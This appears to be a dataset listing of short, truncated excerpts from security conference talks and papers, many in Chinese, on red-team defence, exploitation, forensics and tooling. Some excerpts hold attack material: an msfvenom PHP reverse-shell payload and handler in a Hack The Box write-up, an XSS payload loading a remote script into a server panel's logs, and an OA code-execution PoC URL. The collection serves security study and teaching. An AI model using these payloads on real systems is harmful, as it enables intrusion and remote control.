text
stringlengths
100
9.93M
category
stringclasses
11 values
红蓝攻防:构建实战化网络安全防御体系 奇安信安服团队 著 ISBN:978-7-111-70640-3 本书由机械工业出版社华章分社授权北京世纪卓越信息技术有限公司 在全球范围内制作与发行。 版权所有,侵权必究 目录 作者简介 作者名单 前言 第一部分 红蓝对抗基础 第1章 认识红蓝紫 1.1 实战攻防演练 1.1.1 为什么要进行实战攻防演练 1.1.2 实战攻防演练的发展现状 1.2 蓝队 1.2.1 什么是蓝队 1.2.2 蓝队演变趋势 1.3 红队 1.3.1 什么是红队 1.3.2 红队演变趋势 1.4 紫队 1.4.1 什么是紫队 1.4.2 紫队演变趋势 1.5 实战攻防演练中暴露的薄弱环节 1.6 建立实战化的安全体...
pdf
Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode Matt Suiche Comae Technologies m@comae.io July 7, 2017 Abstract Ethereum is gaining a significant popularity in the blockchain com- munity, mainly due to fact that it is design in a way that enables devel- opers to write decentralized applications (Dap...
pdf
A New Approach to Digital Forensic Methodology And !!BUSTED!! Case studies David C. Smith Samuel Petreski Introductions • David C. Smith, Georgetown University, & HCP Forensic Services – David works as the CSO for Georgetown University and a co-owner of HCP Forensic Services providing information security programs, ...
pdf
1 sAMAccountName欺骗分析和复现 CVE-OLON-QOOVW - Name impersonation 分析 SamAccountName SAM-Account-Type userAccountControl UF_WORKSTATION_TRUST_ACCOUNT ( QLXT ) UF_SERVER_TRUST_ACCOUNT ( WNXO ) UF_NORMAL_ACCOUNT ( SNO ) UF_INTERDOMAIN_TRUST_ACCOUNT ( OLQW ) 利⽤ 创建机器账号 修改samAccountName 检测 总结 拓展 CVE-OLON-QOOWV - KDC bamboozling Ke...
pdf
HVV⾏动之某OA流量应急(⼀): https://www.anquanke.com/post/id/239865 蹭⼀波⽔哥的热度 OA还得看⽔系群友。 ⼚商已发布版本补丁完成修复,建议⽤户尽快更新⾄最新版本 某凌OA任意代码执⾏ 先看⼀下捕获到的POC: /sys/common/dataxml.jsp?s_bean=sysFormulaValidate&script= <payload>&type=int&modelName=test 漏洞出现在 /sys/common/dataxml.jsp 下。 同样类型还有⼀个 sys/common/datajson.jsp 代码: <%@ page language="java" con...
pdf
Rocking the pocket book: Hacking chemical plants for competition and extortion Marina Krotofil Jason Larsen WHITE PAPER, DEFCON 23 FURTHER CO-AUTHORS AND CONTRIBUTORS: Alexander Isakov • Alexander Winnicki • Dieter Gollmann • Pavel Gurikov DAMN VULNERABLE CHEMICAL PROCESS https://github.com/satejnik/DVCP-VAC • https://g...
pdf
Hacking Internet Kiosk’s Paul Craig Defcon 16 – Las Vegas  Who am I?  Paul Craig  Principal Security Consultant.  Security-Assessment.com, Auckland, NEW ZEALAND!  Application Penetration Tester.  Devoted Hacker  Shameless Alcoholic  Email: paul.craig@security-assessment.com  www: http://www.security-assessment...
pdf
1 Humor – Your Adversaries 2 This is how your adversaries envision their DDoS attacks on your webserver: Humor – Your Webserver 3 This is how your webserver will respond after implementing some of the defensive strategies that this talk will cover: Background •  Personal –  Blake currently works as a principa...
pdf
GadgetInspector源码分析 前置废话 我不想搞介绍,就这样吧,写这个主要是⽹上的对我很晦涩,很多别⼈觉得简单的我不会, 包括⼀些汇编指令等,当然本篇也是站在很多前辈的肩膀上进⾏学习,属实是少花了很多功 夫 在分析gadgetinspector源码的时候,⼤概会对各个核⼼类讲解,并简单分析ASM部分,btw本 篇基于jdk8进⾏分析 当然既然是学习,那么我们肯定是需要跟踪代码的,⽽GI这款⼯具属实头疼,本⾝不仅引⼊ 了jdk的⼀些依赖如rt.jar,在调试的过程当中也出现了gadgetinspector当中的类,属实不适合学 习时使⽤,为了解决这个问题,我 在 gadgetinspector.ClassResourceEn...
pdf
Calculating Risk in the Era of Obscurity Reading Between the Lines of Security Advisories Brian Gorenc, Director of Vulnerability Research Dustin Childs, Sr. Communications Manager #BHUSA @BlackHatEvents August 10-11, 2022 BRIEFINGS #BHUSA @BlackHatEvents Who we are and why we’re here #BHUSA @BlackHatEvents (Mis)...
pdf
Black Ops 2007: Design Reviewing The Web Dan Kaminsky Director of Penetration Testing IOActive Inc. Three Interesting Things • Slirpie: Come to my website, be my VPN • P0wf: Automagically discovering the toolkits behind the web • LudiVu: Pretty Intro to Slirpie: Dependence And Otherwise • The fundamental design...
pdf
log4jdetect 被动检测、专项被动检测脚本 安依依赖: source file: https://gist.github.com/n00BToT/5592eb2255d62660ef1553819249c238 被动代理:https://github.com/qiyeboy/BaseProxy 在 https://github.com/fullhunt/log4j-scan 上面改: 思路: 被动扫描方式 监听流量 hook 请求方法 过滤 png、jpg 等等图片的黑名单 根据 dnslog 平台 制作 payload 根据 payload 变形 url参数、post data参数 、headers 发包 不足: 扫描...
pdf
The Six Year Old Hacker: The Six Year Old Hacker: No More Script Kiddies? No More Script Kiddies? Kevin McCarthy Kevin McCarthy DefCon 13 30/Jul/2005 DefCon 13 30/Jul/2005 A Need Born of Frustration. A Need Born of Frustration. ●● ““So what did you do at school today So what did you do at school today””?? ●● The proble...
pdf
Ghost in the Droid Possessing Android Applications with ParaSpectre Jeff Dileo (chaosdata) DEFCON 25 Hi! I’m Jeff, and I have a problem. I like to do bad things to worse programming languages. *audience says* Hiiiiiiiiiiiiiiiiii Jeff Outline • Introduction • Motivation • Original Plan • Android Function Hooking 102 • Para...
pdf
1 Cryptanalysis in real life 周立平 等研究團隊 Do u understand real hackers ? 第3頁 綱目 第一章 緒論 第二章 Mifare Classic Card介紹 第三章 Mifare Classic Card現有 攻擊方式 第四章 二代卡的特性 第五章 自然人憑證 第4頁 RFID RFID 非接觸式 Smart Card 第一章 緒論 攻擊背景 Reader Tag 010101 YoYo卡 一卡通 i-cash 第5頁 第一章 緒論 攻擊手段 Reader Tag 加密 解密 竊聽 第6頁 第一章 緒論 現狀 新/舊卡 改良方式 新卡 用3DES etc 舊卡 改善弱點...
pdf
HTTP/2 The Sequel is Always Worse James Kettle Intro 2019-08: HTTP Desync Attacks 2020-09: The Bitbucket mystery 2021-01: Bitbucket confirmed… but unexploitable 2021-03: Research collision 2021-03: Bitbucket breakthrough cascade - New, more powerful type of desync - Entire issue class becoming exploitable - Atlassian l...
pdf
ⓒ Copyright 2016, blackfort security all rights reserved. Malware is In the Memory Real Time Malware Memory Analysis System 2016 HITCON YoungJin Sim / BLACKFORT Security / Senior Researcher <jine@blackfortsec.com> YoungHak Lee / BLACKFORT Security / Senior Researcher <vstherock@blackfortsec.com> Who we are ⓒ Copyrigh...
pdf
前言: 最近正在写自动化的扫描器,但是老是容易过快被ban,代理ip和分布式成本可能也比较高 或者出现 不稳定(都是假的,只是因为我是学生,没收入,买不起服务器) 那么如何优化现有的扫描过程,即不降低速度 又不给ban呢。 我把这个扫描 叫 华莱士喷射目录扫描。 原来的扫描过程: 华莱士喷射扫描 title: 目录扫描的小tips 就是把扫描顺序改变。这样子目标越多的情况下,同一个域名的扫描间隔时间越长,被ban的可能性也 越低。但是效率不会降低。 在这个基础上 再加上分布式,多线程,随机代理等方法 更加稳健。 工具 找了一圈没找到想要的这样子的工具,同时又比较喜爱dirsearch。一开始想魔改dirsearch的,但是他...
pdf
The Information Security Experts Copyright © 2008 SecureWorks, Inc. All rights reserved. The Wide World of WAFs Ben Feinstein, CISSP GCFA SecureWorks Counter Threat Unit™ DEFCON 16 August 8, 2008 The Information Security Experts Copyright © 2008 SecureWorks, Inc. All rights reserved. • Web Application Firewalls (WAFs) ...
pdf
Off  Grid  communica.ons  with Android m0nk  and  stoker  have  fun  @  DefCon  20  -­‐  Meshing  the  mobile  world Who  are  you  guys? •  m0nk  –  Josh  Thomas –  jbthomas@mitre.org –  m0nk.omg.pwnies@gmail.com •  Stoker  –  Jeff  Robble –  jrobble@mitre.org –  ...
pdf
Fear the Evil FOCA Attacking Internet Connections with IPv6 Chema Alonso @chemaAlonso chema@11paths.com Spain is different Spain is different Spain is different Spain is different ipconfig IPv6 is on your box! And it works!: route print And it works!: ping And it works!: ping LLMNR ICMPv6 (NDP) •  N...
pdf
Technical Service Bulletin: FXR-10 Modifying GE/MACOM MASTR-III Group 6 (403 MHz – 430 MHz) for Amateur Radio Applications (440 – 450 MHz) A FluX Research project in several phases Release Date: 08-01-2008 Last Update: v1.4 08-01-2008 By: Matt Krick, K3MK DCFluX@yahoo.com Radio Model #: GE/MACOM MASTR-III Group 6...
pdf
Shellcodes for ARM: Your Pills Don’t Work on Me, x86 Svetlana Gaivoronski @SadieSv Ivan Petrov @_IvanPetrov_ Why it’s important q   Increasing  number  of  ARM-­‐based  devices q   Significant  number  of  vulnerable  so:ware  and  huge  base  of  reu...
pdf
BLACK OPS OF TCP/IP Spliced NAT2NAT And Other Packet-Level Misadventures Dan Kaminsky, CISSP DoxPara Research www.doxpara.com Where I‟m Coming From…  Black Hat 2001  Impossible Tunnels through Improbable Networks with OpenSSH  Getting Out: ProxyCommands for Non-TCP comm layers  HTTP, SOCKS, UDP, Packet Radio*, AI...
pdf
macOS 上的逻辑提权漏漏洞洞 菜丝 @蚂蚁⾦金金服光年年实验室 关于我 • 花名菜丝,就职于蚂蚁⾦金金服光年年安全实验室 • 从事桌⾯面端和移动端、IoT 设备安全漏漏洞洞的攻防,安全⼯工具开发。从移动应 ⽤用安全到智能设备均有涉猎 • BlackHat, Xdef 等国内外会议演讲者 • 开源了了 iOS 应⽤用分析⼯工具 Passionfruit,了了解⼀一下 逻辑漏漏洞洞的特点 粗暴暴简单 很少需要涉及底层细节,对 新⼿手更更友好 fuzz 不不友好 较难通过⾃自动化模糊测试 利利⽤用稳定 不不破坏内存,相对更更稳定 脑洞洞 条件的串串联,跨组件甚⾄至跨 编程语⾔言的组合 逻辑漏漏洞洞 • 滥⽤用软件既有的特性 • 开发者...
pdf
前⾔ 常规的shellcode注⼊⼀般是通过 VirtualAllocEx , WriteProcessMemory 和 CreateRemoteThread 来实现的,但是这种⽅式是被安全软件重点监控的,同时微软提供的 ETW接⼝也是可以轻易检测出上述⽅式进⾏代码注⼊的痕迹。本⽂的核⼼是讲解怎么利⽤具 备 RWX-S 权限且⾃身有签名的⽩DLL进⾏⼀种⽐较隐蔽的shellcode注⼊, 并讲解具体的代码实现以及在写代码实现的过程中遇到的坑。本⽅法是由⽂章提出的:https: //billdemirkapi.me/sharing-is-caring-abusing-shared-sections-for-code-inject...
pdf
xbeark-javaopenrasp源码阅读 项⽬地址 https://github.com/xbeark/javaopenrasp 简介 随便看了下,这个算是不太难,并且适合我这种初学者啰,简单看看ReadMe可以发现实现 了⼀些基本功能,这⾥我们了解他的基本实现思路即可 阅读本项⽬⽤到的ASM相关前置知识 btw,只搞⼀些⽐较重要的点,⾸先我们知道在ASM CORE API当中有⼏个⽐较重要的点是 ClassReader、ClassVisitor、ClassWriter以及AdviceAdapter,这⾥不会讲代码怎么写,只是告诉 这是⼲嘛的便于对代码架构的理解 ClassReader/ClassWriter 稍微不是那么重要...
pdf
国 产 智 能 网 联 汽 车 漏 洞 挖 掘 中 的 几 个 突 破 点 马良 绿盟科技 格物实验室 安全研究员 自我介绍 马良 绿盟科技 格物实验室 安全研究员 十多年嵌入式软、硬件开发经验, 喜欢DIY一些东西  2016 - Xpwn:西门子PLC蠕虫演示  2018 - 看雪开发者大会:智能设备固件提取的十种方法  2018 - 极棒:机器特工挑战赛,关闭激光报警器电源、窃听器放置、气球遮挡摄像头等  2018 - JD-HITB:介绍Vocore2模块在安全研究中的应用,提出一种工控设备攻击模型  2021 - 极棒《我是极客》:改装电源插座, 通过4G用电力猫安全缺陷远程控制内...
pdf
2013 Trend Micro 25th Anniversary --Fuzzing with context enlightenment and exploit OSX IOKit vulnerabilities for fun and profit (P)FACE into the Apple core and exploit to root 2013 Trend Micro 25th Anniversary Agenda • Who we are • Passive fuzzing framework • Context enlightenment • Exploit to root 2013 Trend Micro...
pdf
Is This Your Pipe? Hijacking the Build Pipeline Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$ █ Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$ su greg dc101$ whoami @_GRRegg dc101$ █ Last login: Aug 7 2011 from DEFCON 19 dc101$ whoami @rgbkrk dc101$ su greg dc101$ w...
pdf
Your Peripheral Has Planted Malware —An Exploit of NXP SOCs Vulnerability Yuwei ZHENG, Shaokun CAO, Yunding JIAN, Mingchuang QIN UnicornTeam, 360 Technology Defcon 26 About us • 360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PC and cellphones. • Un...
pdf
Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game Joshua Drake, Zimperium Steve Christey Coley, MITRE DEF CON 24 Aug 7, 2016 Introductions • About Josh – 20-years of VR, Ran iDefense VCP • About Steve – CVE co-founder, “Responsible Disclosure” (sorry), CVSS, CWE, ... • Why we are doing th...
pdf
Objective We have to defeat the enemies and save the earth!! Our contributions ●  Introduce a new concept of analysis framework to use easily o  perform analysis of normal application by using web proxy ●  Introduce methodologies for implementing our concept o  pros and cons of the methodol...
pdf
nmap -sS -A 10.10.10.28 hack the box——-Oopsie 0x00 MEGACORP_4dm1n!! ​ ​ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 > test.php use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 10.10.16.3 set LPORT 4444 run -j 0x01 shell git clone https://github.com/maurosoria/dir...
pdf
DefCon 22, Las Vegas 2014 Abusing Software Defined Networks Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview What is it? Exploiting it! Fixing it! Moving Forward Wrapping Up Modern Day Networks Vendor Dependent Difficult to scale Complex and Prone to B...
pdf
Developing Multi-Agency Interoperability Communications Systems: User's Handbook Applicable To: ACU-1000 Modular Interface/Interconnect System And TRP-1000 Transportable Radio Interconnect System ACU/TRP-1000 Handbook Page ii Developing Multi-Agency Interoperability Communication Systems: User’s Handbook ACU-1000 M...
pdf
以攻促防 —— 企业红蓝对抗体系建设 关于我 胡珀 / lake2 腾讯 - 技术工程事业群(TEG)- 安全平台部 应用运维安全总监,基础安全负责人,资深专家工程师 腾讯安全应急响应中心(TSRC) Tencent Blade Team 安全研究团队 腾讯蓝军及“倚天”蓝军自动化平台 主导 逾十五年网络安全经验 2007年加入腾讯,一直从事基础安全相关工作 安全组织80SEC/蓝星群/企业蓝军联盟(COS)成员 企业安全体系建设思路 - SDL • 安全技术培训 • 安全意识培训 • 安全规范 • 安全技术培训 • 安全意识培训 • 安全规范 • 代码审计 • 渗透测试 • 应急响应执行 • 人工巡查 • 漏洞扫描系统 • 安全情...
pdf
Hellaphone John Floren Introduction Android Inferno Bibliography Hellaphone: Replacing the Java in Android John Floren Sandia National Labs July 2012 Collaborators: Joshua Landgraf, Joel Armstrong Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsi...
pdf
Bypass Credential Guard 0x01 Credential Guard 1 Windows Defender Credential Guard (WDCG) Windows 10 WDCG LSASS (LSAISO) , (trusted) administrator / System LSASS/LSAISO WDCG NTLM Kerberos (Kerberos derived credentials) (domain credentials) Credential Guard lsass 2LSALSAVSM 2 Gredential Guard Microsoft Powersh...
pdf
DIY Hardware implant over I2C Part of the NSA Playset Josh Datko and Teddy Reed DEF CON 2 2 August 10, 2014 Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 1 / 60 Outline 1 Introduction NSA Playset DEF CON Series 2 Deconstruction I2C Attack Surfaces 3 Reconstruction I2C Module Con...
pdf
PentesterAcademy.com ©PentesterAcademy.com VoIPShark: Open Source VoIP Analysis Platform Nishant Sharma Jeswin Mathai Ashish Bhangale PentesterAcademy.com & AttackDefense.com PentesterAcademy.com ©PentesterAcademy.com PentesterAcademy.com About Us Me, Nishant Sharma • R&D Manager and Lead Trainer, Pentester Academy • ...
pdf
信息流上线了一个CS上线器 https://i.hacking8.com/cobaltspam 我是照着 https://github.com/hariomenkel/CobaltSpam 来改的,而CobaltSpam是https://github.co m/Sentinel-One/CobaltStrikeParser fork修改的,后者是用于解析beacon配置的仓库,从中可以学到 一些原理 - = 介绍 CS为了兼容MSF,默认配置将stage下载的uri硬编码了 , 所以访问 就能得到beacon,从中能够解析到C2的各种配置信息。 接着就是定位到数据,具体怎么找的可以看 https://blog.xpnsec.co...
pdf
端到端流水线驱动DevOps落地 DevOps时代社区 景韵 无关趋势,关乎生死 DevOps 2017 年度报告 Continuous Delivery Continuous Integration DevOps Continuous Deployment Lean (End to End Flow) Principles Practices Running Lean Product/Market Fit (Finding&Validating Ideas) Scrum/Kanban (Process) XP (Engineering) Operations Business Software Service Agile(Dev...
pdf
赛博回忆录星球出品,仅供小范围技术交流,请勿随意转发进行攻击 赛博回忆录星球出品,仅供小范围技术交流,请勿随意转发进行攻击 欢迎关注公众号:赛博回忆录 赛博 exp 如下: POST /alarmConfig HTTP/1.1 Host: xxx.xxx.xxx.xxx:8443 Connection: close Content-Length: 55 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (cybermemory NT 10.0; Win64; x...
pdf
Caffeine Monkey:  Automated Collection, Detection and  nalysis of Malicious JavaScript  A Ben Feinstein, CISSP  Daniel Peck  {bfeinstein, dpeck}@secureworks.com SecureWorks, Inc.  Introduction  In recent years, the web browser has likely become the single most ubiquitous computing  application. Web browsers can be fou...
pdf
1SDL 28Web 3RedHatApacheAmazonWeblogicRCE Weblogic 42015PyconPython2016 VIP2017Java Json ;2018Java PART 01 CONTENTS PART 02 PART 03 PART 04 01 02 03 04 PART 01 1 2 3 1SecurityManager 2 3 SecurityManager PART 02 SecurityMemberAccess <constant name="struts.excludedClasses" value=" java.lang.Object,java.lang.Runtime,ja...
pdf
Torturing Open Government Systems for Fun, Profit and Time Travel Dr. Tom Keenan FCIPS, I.S.P., ITCP, Professor Faculty of Environmental Design & Dept. of Computer Science keenan@ucalgary.ca @drfuture decreeping.wordpress.com DEF CON 21 Las Vegas, NV August 1-4, 2013 Disclaimers These views are mine, not ...
pdf
You Can You Can’’t See Me t See Me!! !! 看不見的網站攻擊 看不見的網站攻擊 Unohope / Trueman PDF created with pdfFactory Pro trial version www.pdffactory.com 講者簡介 講者簡介 u Trueman u http://roamer.cc u 網駭科技技術顧問,曾任職於入口網站、 金融業、資安原廠與專業資安服務廠商; 專長於網路滲透測試、駭客攻擊手法研 究。並曾擔任多場資安研討與發表會主講 人。 PDF created with pdfFactory Pro trial version www.pdffactory...
pdf
August 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Exploit Mitigation Techniques on iOS Max Bazaliy A Journey Through August 4-7, 2016 About me 1 2 3 4 5 6 7 8 9 10 11 12 o  From Kiev, Ukraine o  Staff Engineer at Lookout o  Focused on XNU, Linux and LLVM internals o  Interested in jailbreak...
pdf
Air Traffic Control: Insecurity and ADS-B Righter Kunkel, CISSP, CISA Security Researcher defcon 17 defcon 17 Righter Kunkel 2 Agenda Who am I? ATC Background DOS on a Tower State of Airline Security Where are we going? ADS-B defcon 17 Righter Kunkel 3 Who am I? Security Field for >12 years Worked with secure o...
pdf
While other books have tackled the military-internet complex, tech-enabled intelligence gathering, and cyberwarfare, together with WikiLeaks, Edward Snowden, and the 2016 US election, there is a crucial element to the stories missing in all of them. In his revelatory new book, CULT OF THE DEAD COW: How the Original...
pdf
Achieve More. SanDisk Confidential 1 June 23, 2011 Economics of Password Cracking in the GPU Era 8/3/2011 Robert Imhoff- Dousharm SanDisk Confidential 2 2 June 23, 2011 Overview Introduction GPU Cracking Economics Deployment Explained Lessons Learned Conclusion Q/A SanDisk Confidential 3 ...
pdf
Hacking Web Apps Def Con 11 version Copyright 2002-2003 - David Rhoades slide 2 Warning – Hazards to your Freedom • Unauthorized access to systems & data is illegal in most places. – Get permission in writing before performing scans, audits, assessments, etc! – For details see http://www.lightlink.com/ spacenka/fo...
pdf
Java安全之Cas反序列化漏洞分析 0x00 前言 某次项目中遇到Cas,以前没接触过,借此机会学习一波。 0x01 Cas 简介 CAS 是 Yale 大学发起的一个开源项目,旨在为 Web 应用系统提供一种可靠的单点登录方法,CAS 在 2004 年 12 月正式成为 JA-SIG 的一个项目,开源的企业级单点登录解决方案。 0x02 远程调试环境搭建 下载地址,将环境war包下载,部署到tomcat即可 tomcat目录bin文件下, startup_debug.bat call %EXECUTABLE%" start %CMD_LINE_ARGS% 改为 IDEA中设置Remote远程调试5005即可完成。 0x03 漏...
pdf
#BHUSA @BlackHatEvents The Journey Of Hunting In-The-Wild Windows LPE 0day Quan Jin DBAPPSecurity #BHUSA @BlackHatEvents Information Classification: General Who am I ⚫ Quan Jin (@jq0904) • Security Researcher at DBAPPSecurity • Member of ➢ DBAPPSecurity Lieying Lab ➢ DBAPPSecurity WeBin Lab • Interested in ➢ Vulnera...
pdf
1 EL表达式注⼊的进阶利⽤ 前⾔ 环境搭建 正⽂ ⽆回显执⾏命令 有回显执⾏命令 任意代码执⾏ 直接连接蚁剑 思路扩展 @yzddMr6 表达式注⼊是Java安全从业者会经常碰到的⼀类漏洞。Struct2的ognl表达式注⼊,Nexus3的EL表 达式注⼊,前⼀段时间爆出的Spring Cloud gateway的Spel表达式注⼊等等,重要性不需要多说。 前⼀段时间徐师在Make JDBC Attacks Brilliant Again 番外篇⾥也提到了postgresql+EL表达式来 写⼊Weblogic⼀句话的场景,所以今天想借此机会分享⼀些进阶利⽤的payload。 Tomcat 8.5+jdk8 这⾥模拟了⼀个...
pdf
©SecurityTube.net Chellam – a Wi-Fi IDS/Firewall for Windows ©SecurityTube.net Vivek Ramachandran WEP Cloaking Defcon 19 Caffe Latte Attack Toorcon 9 Microsoft Security Shootout Wi-Fi Malware, 2011 802.1x, Cat65k Cisco Systems B.Tech, ECE IIT Guwahati Media Coverage CBS5, BBC Trainer, 2011 ©SecurityT...
pdf
BITSQUATTING DNS  HIJACKING  WITHOUT  EXPLOITATION ARTEM  DINABURG DEFCON  19 About  Me J The  Problem Affected  PlaHorms Low  Skill Cheap Bitsquatting Like  typosquaPng,  but  for  bits TyposquaPng There  are 1500  daily  DNS  requests  per  person. Humans  type ...
pdf
准备工作: 找到网站名 JS payload 复现过程: 此时的 wwwroot 目录下面是没有文件的 发包 User-Agent: </tExtArEa>"><script src=http://URL/1.js></script> 点击网站日志 成功 RCE 原理分析 这里我用的环境是 7.9.1 版 目前的官网最新版也是 7.9.1 版本 复现流程可以看出来是 xss+后台 RCE 的组合拳 首先是 xss,我们可以看到日志可以成功用</textarea>闭合,然后就是经典的 script src 分析源码,看看宝塔是如何读取日志的 这里有一个 getsitelogs 函数,其中获取了网站的日志路...
pdf
C0RE  Team       Challenge  Impossible   -- Multiple  Exploit  On  Android Hanxiang  Wen,  Xiaodong  Wang About  us  &  C0RE  Team – Hanxiang  Wen,  温瀚翔 • Security  researcher  @  C0RE  Team • Focus  on  Android  vulnerability  research  and  exploit  development – Xiaodong  Wang,  王晓东 •...
pdf
An Open Guide To Evaluating Software Composition Analysis Tools By Ibrahim Haddad, PhD. November 2020 www.linuxfoundation.org The Linux Foundation 2 An Open Guide To Evaluating Software Composition Analysis Tools Introduction With the help of software composition analysis (SCA) tools, software development teams...
pdf
Triton  and  Symbolic execution  on  GDB bananaappletw @  HITCON 2017/08/26 $whoami • 陳威伯(bananaappletw) • Master  of  National  Chiao Tung University • Organizations: • Software  Quality  Laboratory • Bamboofox member • Vice  president  of  NCTUCSC • Specialize  in: • symbolic  executio...
pdf
跟IE簽約成為XSS少⼥吧 Make a contract with IE and become a XSS girl! Yosuke HASEGAWA http://utf-8.jp/ 歉意 I'm sorry 謝罪 我從來沒有看過動畫作品 "魔法少⼥⼩圓☆魔⼒" I've never watched the anime "Puella Magi Madoka Magica" 「まどか☆マギカ」⾒てません 自我介紹 Who am I? 自己紹介 Yosuke HASEGAWA • NetAgent Co.,Ltd. R&D dept. • Secure Sky Technology Inc. technical adviser...
pdf
KERNEL WARS: KERNEL-EXPLOITATION DEMYSTIFIED Introduction to kernel-mode vulnerabilities and exploitation • Why exploit kernel level vulnerabilities? – It's fun! – Relatively few are doing it – Bypasses defense mechanisms and restrictions – Attacks at the lowest level • Does not rely on any particular application b...
pdf
XMLDecoder反序列化 XMLEncode序列化 package com.example; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; public class XMLEncoder {    public static void main(String[] args) throws IOException {        HashMap<Object, Object> hashMap = new HashMap<>();        ArrayList<Object> arrayList = ne...
pdf
返璞归真 重识物理安全与近源渗透 返璞归真 重识物理安全与近源渗透 PushEAX CONTENTS 目录 01 02 03 第一章 :近源威胁面分析 第三章 : ANT Tools工具包介绍 第二章 :近源渗透手段 近源威胁面分析 ——虽然只有极少黑客选择在真实世界发起进攻, 但我们面对的威胁远不止与此。 01 谁会选择在现实世界发起攻击? 2007年,网络托管商CI Host的数据中心遭到两名蒙面男子抢劫。 劫匪在持枪劫持了一名IT员工后,盗窃了20台服务器。 黑客攻击(物理) 攻击者通过贿赂内部员工,在厂区内安装无线路由器。利用无线 信号直接连入企业内网,侵入内网中的信息系统。 通过为他人“改机、解锁”手机共9000余部,五个...
pdf
Vladimir  Katalov ElcomSo0  Ltd. www.elcomso0.com What  Google  knows  about  you  and  your devices  (and  how  to  get  it) Academia  Sinica,  Nankang,  Taipei  AUG  28-­‐29,  2015 www.elcomso0.com •  Curiosity •  Privacy •  The  right  to  know •  Government  s...
pdf
Tuning Your Brain Tuning Your Brain  Why does certain music get you out of a black hole?  Often when we're stuck in a black hole, or just can't figure the problem out - the right music will get us out of it. Why does this work? It seems motivating, and it seems like we solve problems easier, and it seems to c...
pdf
Attacks against 2wire Residential Gateways Attacks against 2wire Residential Gateways WHO AM I? hkm Born in Cozumel island. Have worked as: Forensic investigator Malware analyst Incident response Personal webpage: http://www.hakim.ws Forum: https://underground.org.mx My current research is focused on residential r...
pdf
Book Review: A Tale of Two Sciences: Memoirs of a Dissident Scientist by Peter A. Sturrock (Exoscience: Palo Alto) 2009. by Richard Thieme “A Tale of Two Sciences: Memoirs of a Dissident Scientist,” by Dr. Peter A. Sturrock, is a personal work by the well-known Stanford physicist and astrophysicist, reflecting on the ...
pdf
数据挖掘赋能安全感知: 阿里云大数据入侵检测实践 Han Zheng 资深安全工程师 2019年5月29日 Yue Xu 安全工程师 团队成员 任职于阿里巴巴云安全中心,负责算法实现和入侵检测与威胁情 报的研发团队。 Han Zheng、Yue Xu、Wei He 云 + 安全性 优势 • 数据计算能力 • 丰富的安全日志 • 从上帝视角来看数据 挑战 • 庞大的业务环境 • 从“脚本小子”到国家,多方遇敌 • 精确率和召回率都让人担忧 数据流 威胁建模案例表 • 暴力攻击 • 恶意行为链 • 恶意 Web 脚本(即 Webshell) • 攻击载荷回溯 威胁建模案例表 • 暴力攻击 • 恶意行为链 • 恶意 Web 脚本(即 We...
pdf
1 pingOrce出题⼈writeup ---种环境变量注⼊劫 持bash的实际利⽤场景 前⾔ GoAhead GoAhead + bash 参考 前不久p⽜分享了⼀个利⽤环境变量注⼊劫持bash的技巧. 当时我就在想这种环境变量的注⼊有没有什么⽐较通⽤的场景。⼀般遇到的环境变量注⼊基本上都是直 接使⽤ld_preload解决问题。p⽜的这种新的环境变量注⼊的利⽤技巧,有没有什么特殊的利⽤⾯呢。 嵌⼊式设备常⽤的Web服务器 GoAhead 出现过环境变量注⼊漏洞 CVE-2017-17562 和 CVE-2021- 42342。 漏洞的原理很简单:服务器会把收到的CGI请求参数直接写⼊到环境变量中。 CVE-201...
pdf
Mimikatz那些鲜为⼈知的功能(⼀) #.内⽹渗透/mimikatz author: haya 作为Windows的神兵利器, sekurlsa::logonpasswords 、 lsadump::dcsync 可能是 Mimikatz使⽤频率⽐较⾼的两个功能了。⽽实际上,Mimikatz还有很多有意思的功能,可以通 过阅读源码进⼀步去了解。 本⽂主要是盘点Mimikatz的⼀些冷⻔功能,以及这些功能在实战中的具体使⽤场景。 1. rpc::server 这个功能主要是启动⼀个rpcserver,允许使⽤Windows rpc远程调⽤mimikatz。 通过这个RPC远程调⽤功能,可以绕过⼀些本地的基于字符串的特征查杀。⽐如 ...
pdf
Java反序列化实战 绿盟科技安全研究经理 廖新喜(@xxlegend) 绿盟科技攻防实验室招人 • 研究方向:webshell检测,安全大数据分析 • 联系邮箱:liaoxinxi[@]nsfocus.com或者 liwenjin[@]nsfocus.com • 绿盟科技 安全研究经理 • 看雪大会讲师,Pycon大会讲师,央视 专访嘉宾 • 向RedHat、Apache、Amazon, Weblogic,阿里提交多份RCE漏洞报告 • 博客:xxlegend.com 个人介绍 反序列化入门 Fastjson Weblogic 反序列化防御 反序列化入门 • 序列化是用于将对象转换成二进制串存储,对应着writeObject • ...
pdf
PSWN PSWN Public Safety Wireless Network Comparisons of Conventional and Trunked Systems May 1999 Comparisons of Conventional and Trunked Systems May 1999 ii FOREWORD Land mobile radio (LMR) networks are critical for public safety communications. In support of the Public Safety Wireless Network (PSWN) Program Manageme...
pdf
做红队你需要学习“如何挖掘战壕”(二) 0x00 前言 在这个系列的上一篇文章中,我们主要讲了什么是红队基础设施以及红队基础设施的架构与设计思路。 最后我们分析了构成红队基础设施的几个元素:ip和域名、C2工具、前置器。今天我们主要分析的是IP 和域名,也就是如何选择域名和IP,在攻防对抗中域名和IP是非常重要的元素,在防御上基于域名和IP 数据来追踪攻击是非常重要的手段。因此作为公鸡队一定要选好域名和IP,这样会事半功倍。 0x01 域名的选择 抢注过期域名 这个方法公鸡队小伙伴应该都知道,主要利用的是https://www.expireddomains.net/expired-domain s/ 的数据。这个网站实时更新着快要过...
pdf
